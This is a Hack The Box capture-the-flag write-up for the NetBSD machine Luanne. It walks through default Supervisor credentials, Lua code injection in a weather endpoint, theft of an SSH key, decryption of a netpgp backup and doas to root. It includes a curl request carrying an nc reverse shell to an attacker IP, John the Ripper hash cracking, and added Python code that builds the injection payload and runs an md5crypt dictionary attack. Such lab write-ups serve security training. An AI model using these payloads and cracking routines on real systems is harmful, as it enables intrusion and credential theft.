Hack The Box — Luanne — Write Up

Lovelesh Gangil
Mar 29, 2021
https://app.hackthebox.eu/machines/302

Luanne is an easy difficulty NetBSD machine. Network enumeration reveals a Supervisor process manager (served by Medusa httpd) that is still using its default login credentials. The process listing exposed through Supervisor reveals a Lua script, running inside a custom weather web application on a bozohttpd server, that is vulnerable to code injection. A second, misconfigured bozohttpd instance running in development mode is then leveraged to obtain the private SSH key of the system user r.michaels. Using netpgp, we decrypt an encrypted tar backup that contains a password which r.michaels reuses, and that user is allowed to execute commands as root via doas.

Scanning and Enumeration

Nmap output reveals an SSH server and an Nginx server running on their default ports. A Medusa server is also running on port 9001. Navigating to both port 80 and port 9001 using a web browser returns an Authentication Required message.

However, Nmap recognized the Medusa server as a Supervisor process manager. Searching online for the default credentials of the Supervisor process manager reveals the username and password user:123.

Let’s try to login on port 9001 using the credentials:

Supervisor is managing some services on the host, and its web interface lets us read their output, which gives us further information. Clicking the Tail -f Stdout action of the processes service returns a real-time listing of the processes being monitored on the host, including their full command lines.

It is worth noting that two httpd processes are running, one on port 3001 and the other on port 3000.

The robots.txt file on port 80 disallows the /weather/ directory, so let's visit it. Further enumeration reveals an endpoint beneath it, /weather/forecast.

The response from the endpoint suggests that city=list is a valid parameter, so let's use it to list the available locations.

Gaining Access

Searching online for httpd Lua vulnerabilities reveals the following article as the first result. Scrolling down to the LUA CODE INJECTION section, we can see vulnerable examples for Nginx and CGI: user input is pasted into Lua source that is then compiled and executed, so a value that closes the surrounding string literal can append arbitrary statements.

First, start a netcat listener on port 4444 locally so that the reverse shell can connect back to us. Then send the following request: the value of city closes the Lua string literal, calls os.execute with a fifo-based reverse shell, and comments out the rest of the line with --. Note that the & in 2>&1 is encoded as %26 so that it is not interpreted as a query-string separator.

curl "http://10.10.10.218/weather/forecast?city=')+os.execute('rm+/tmp/pbf;mkfifo+/tmp/pbf;cat+/tmp/pbf|/bin/sh+-i+2>%261|nc+10.10.14.3+4444+>/tmp/pbf')+--"

This is successful, and a reverse shell is returned. We can now execute commands on the host as the web server user, _httpd.
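To make the structure of that request explicit, here is an added example (not code from the original write-up) that builds the same kind of payload and decodes it the way the server sees it. The Lua template forecast('...') is a hypothetical stand-in for the real weather.lua, which the write-up does not show; the host, attacker address and port are the ones used above. Unlike the curl command, it URL-encodes every metacharacter rather than only the ampersand, which decodes to the same thing.

```python
"""Lua code injection payload construction for the /weather/forecast endpoint.

Added example, not code from the original write-up. It builds the same
kind of payload the write-up sends with curl and shows why every shell
metacharacter in the injected command must be URL-encoded.
"""
from urllib.parse import quote_plus, urlparse, parse_qs

# Assumed shape of the vulnerable server-side Lua: user input is pasted
# into a string literal and then compiled/executed. The real weather.lua
# is not shown in the write-up; this template is a hypothetical stand-in.
LUA_TEMPLATE = "return forecast('{city}')"


def lua_injection(cmd: str) -> str:
    """Return the city value that closes the literal, runs cmd, and comments out the rest."""
    # ') ends the string and the enclosing call; -- starts a Lua line comment
    # that swallows the template's trailing quote and parenthesis.
    return "') os.execute('" + cmd + "') --"


def reverse_shell_cmd(lhost: str, lport: int, fifo: str = "/tmp/pbf") -> str:
    """The mkfifo reverse shell from the write-up, parameterised."""
    return (f"rm -f {fifo};mkfifo {fifo};cat {fifo}|/bin/sh -i 2>&1|"
            f"nc {lhost} {lport} >{fifo}")


def build_url(base: str, cmd: str) -> str:
    """URL-encode the payload: spaces become '+', and '&' becomes %26 so the
    shell's 2>&1 is not split off as a second query parameter."""
    return f"{base}/weather/forecast?city={quote_plus(lua_injection(cmd))}"


def decoded_city(url: str) -> str:
    """Decode the query string the way the server does ('+' -> space, %26 -> &)."""
    return parse_qs(urlparse(url).query)["city"][0]


def rendered_lua(city: str) -> str:
    """What the hypothetical template compiles to after the value is pasted in."""
    return LUA_TEMPLATE.format(city=city)


if __name__ == "__main__":
    url = build_url("http://10.10.10.218", reverse_shell_cmd("10.10.14.3", 4444))
    print(url)
    # return forecast('') os.execute('rm -f /tmp/pbf;...') --')
    print(rendered_lua(decoded_city(url)))
```

Running it prints the encoded URL and the Lua statement the server would end up executing: the original call receives an empty city, the injected os.execute runs our command, and the comment hides the leftover quote and parenthesis.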

Privilege Escalation

Enumeration of the filesystem reveals the file /var/www/.htpasswd .

Listing the content of the file, we see the following hash for the user webapi_user .

Let’s store the hash into a file called hash and attempt to crack it using John The Ripper.

echo "webapi_user:\$1\$vVoNCsOl\$lMtBS6GL2upDbR4Owhzyc0" > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

John reveals the password iamthebest for the user webapi_user. These are the credentials required by the authentication on port 80, but after logging in there is nothing of interest there. Back in the shell, the same credentials also work against the second httpd instance listening on localhost:3001, which is running in development mode and serves the home directory of r.michaels under the /~r.michaels/ path:

curl --user webapi_user:iamthebest localhost:3001/~r.michaels/id_rsa

Then, store the key in a file and name it id_rsa , give the appropriate permissions and connect to the host using SSH.

chmod 600 id_rsa
ssh -i id_rsa r.michaels@10.10.10.218

This is successful. The user flag is located in /home/r.michaels/user.txt .

Enumeration of the home directory reveals the file devel_backup-2020-09-16.tar.gz.enc in the backups directory. Judging by the file extension, this is an encrypted tar archive. Further enumeration reveals the files /home/r.michaels/.gnupg/pubring.gpg and /home/r.michaels/.gnupg/secring.gpg. However, gpg is not installed on the host (the command returns not found), and uname -a confirms that the host OS is NetBSD.

Let’s search online for the NetBSD implementation of the GnuPG.

Google reveals the tool netpgp as the second result.
As we can see from the manual page, we can encrypt and decrypt files using netpgp .

It is very likely that the two files we found earlier in the directory /home/r.michaels/.gnupg/ , have been used for encrypting the tar file we also found in the /home/r.michaels/backups/ directory. Let’s try to decrypt the tar file by issuing the following command.

cd /home/r.michaels/backups
netpgp --decrypt --output=devel_backup-2020-09-16.tar.gz devel_backup-2020-09-16.tar.gz.enc

This attempt fails in the backups directory, so let's copy the encrypted file into /tmp and try again there.

cp /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc /tmp
cd /tmp
netpgp --decrypt --output=devel_backup-2020-09-16.tar.gz devel_backup-2020-09-16.tar.gz.enc

The decryption was successful. The netpgp tool appears to automatically use the keys that were stored in the directory /home/r.michaels/.gnupg/ . Finally, let’s decompress the tar file we just decrypted.

tar xvzf devel_backup-2020-09-16.tar.gz

Enumeration of the file /tmp/devel-2020-09-16/www/.htpasswd reveals the hash $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu. for the user webapi_user.

Let’s crack it using John and check if the password is different from the one we found earlier for the same user. First, we have to add the hash into a file and name it hash . To do so, we execute the following commands locally. Then, we run john .

echo "webapi_user:\$1\$6xc7I/LW\$WuSQCS6n3yXsjPMSmwHDu." > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

This is successful. The password littlebear is revealed for the user webapi_user, a different password from the one in the live .htpasswd. Let's further enumerate the system by running the LinPEAS script: download it locally, transfer it to the host, then give the file execute permission and run it.
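Both cracking steps above (the live .htpasswd hash and the one recovered from the backup) rely on MD5-crypt, the $1$ scheme John recognises. The following added example, which is not code from the write-up or from John the Ripper, re-implements md5crypt so the two recovered passwords can be verified offline against the hashes shown on this page, and shows the per-candidate check a dictionary attack performs. The three-word wordlist is constructed here as a stand-in for rockyou.txt.

```python
"""MD5-crypt ($1$) verification of the two .htpasswd hashes from the write-up.

Added example, not code from the original write-up or from John the Ripper.
It re-implements the FreeBSD/NetBSD md5crypt algorithm so the recovered
passwords can be checked offline against the hashes shown on the page.
"""
import hashlib
from typing import Iterable, Optional

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value: int, count: int) -> bytes:
    """crypt(3)-style base64: low 6 bits first, 'count' characters."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: str, salt: str) -> str:
    """Compute the $1$salt$hash string for password (salt: up to 8 chars)."""
    pw = password.encode()
    sa = salt.encode()[:8]
    # Start with pw + magic + salt ...
    ctx = hashlib.md5(pw + MAGIC + sa)
    # ... then mix in md5(pw + salt + pw), one byte of it per byte of pw.
    alt = hashlib.md5(pw + sa + pw).digest()
    pl = len(pw)
    while pl > 0:
        ctx.update(alt[:min(pl, 16)])
        pl -= 16
    # Walk the bits of the password length: NUL for set bits, pw[0] for clear bits.
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 rounds with a data-dependent mixing pattern (the deliberately slow part).
    for r in range(1000):
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(sa)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    f = final
    enc = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
           + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
           + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
           + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
           + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
           + _to64(f[11], 2))
    return (MAGIC + sa + b"$" + enc).decode()


def check_htpasswd(line: str, candidate: str) -> bool:
    """True if candidate is the password behind a 'user:$1$salt$hash' line."""
    _, stored = line.split(":", 1)
    magic, salt = stored.split("$")[1:3]
    if magic != "1":
        raise ValueError("not an MD5-crypt hash")
    return md5crypt(candidate, salt) == stored


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate that verifies, else None."""
    for word in wordlist:
        if check_htpasswd(line, word):
            return word
    return None


# Hash lines as shown in the write-up (live .htpasswd, then the one in the backup).
LIVE_LINE = "webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0"
BACKUP_LINE = "webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu."

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "iamthebest", "littlebear"]

if __name__ == "__main__":
    print(crack(LIVE_LINE, WORDLIST))    # iamthebest
    print(crack(BACKUP_LINE, WORDLIST))  # littlebear
```

The 1000-round loop is what makes each guess cost a thousand MD5 operations; it was a reasonable work factor in 1994, but it is why rockyou-sized dictionaries still go through these hashes in seconds on modern hardware.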

chmod +x linpeas.sh
sh linpeas.sh

LinPEAS reveals that the doas.conf file contains the configuration permit r.michaels as root. The doas command is the sudo alternative that originated in OpenBSD and is also available on NetBSD. That means we can execute commands as root, as long as we know the password of r.michaels. The password littlebear recovered from the backup turns out to be reused as that user's login password, so let's run the following command to get a shell as root, providing littlebear at the doas prompt.

doas sh

We did it…. We are root now….
The root flag is located in /root/root.txt .

Visit My Hack The Box Profile —

https://app.hackthebox.eu/profile/464208

For any queries, contact me on my Twitter and LinkedIn profiles:

https://twitter.com/loveleshgangil

Lovelesh Gangil

Offensive Security | Digital Forensics and Incident Response (DFIR) | CAP | GPCSSI '21 | ICSI (CNSS) | CEH (Practical)